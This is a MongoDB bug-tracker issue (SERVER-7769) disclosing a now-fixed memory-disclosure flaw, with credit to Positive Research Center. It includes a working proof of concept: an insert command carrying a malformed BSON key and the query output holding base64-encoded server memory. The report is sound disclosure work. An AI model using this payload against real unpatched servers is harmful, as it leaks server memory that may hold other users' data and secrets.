Uploaded image for project: 'Core Server'
  1. Core Server
  2. SERVER-7769

use --objcheck by default, Server arbitrary memory reading

    Details

    • Type: Bug
    • Status: Closed
    • Priority: Major - P3
    • Resolution: Fixed
    • Affects Version/s: None
    • Fix Version/s: 2.3.2
    • Component/s: None
    • Labels:
      None
    • Operating System:
      ALL

      Description

      The specialists of the Positive Research center have detected "Server arbitrary memory reading" vulnerability in MongoDB application.

      Cause of incorrect execution of BSON-document length in column name in the insert command it’s possible to insert a record which can contain a base64-encrypted server memory chunks.

      Example of use:

      Suppose you have a table "dropme" with write permission.

      Execute the following command with a result:

      > db.dropme.insert(

      {"\x16\x00\x00\x00\x05hello\x00\x010\x00\x00\x00world\x00\x00" : "world"}

      )
      > db.dropme.find()

      { "_id" : ObjectId("50857a4663944834b98eb4cc"), "" : null, "hello" : BinData(0,"d29ybGQAAAAACREAAAAQ/4wJSCCPCeyFjQkRAAAAAAAAAAAAWbcQAAAAMQAAAAEAAABgcicICAAAAAcAAACgKo0JABw5NAMAAAAAAAAAAAAAAMQ3jAlmAGkAQQAAAEIAaQBuAEQAYQB0AGEAKAAxADEAOQAsACIAYgAzAEoAcwBaAEEAQQBBAEEAQQBBAD0AIgApAAAAdABSAFEAAAAiAGgAZQBsAGwAbwAiACAAOgAgAEIAaQBuAEQAYQB0AGEAKAAxADEAOQAsAC...........................ACkALAAgACIAFg==") }

      After base64-code decryption you can get bytes from random server memory chunks.

      Credits

      The vulnerability was discovered by Mikhail Firstov, Positive Research Center (Positive Technologies Company)

        Attachments

          Issue Links

            Activity

              People

              • Votes:
                1 Vote for this issue
                Watchers:
                11 Start watching this issue

                Dates

                • Created:
                  Updated:
                  Resolved: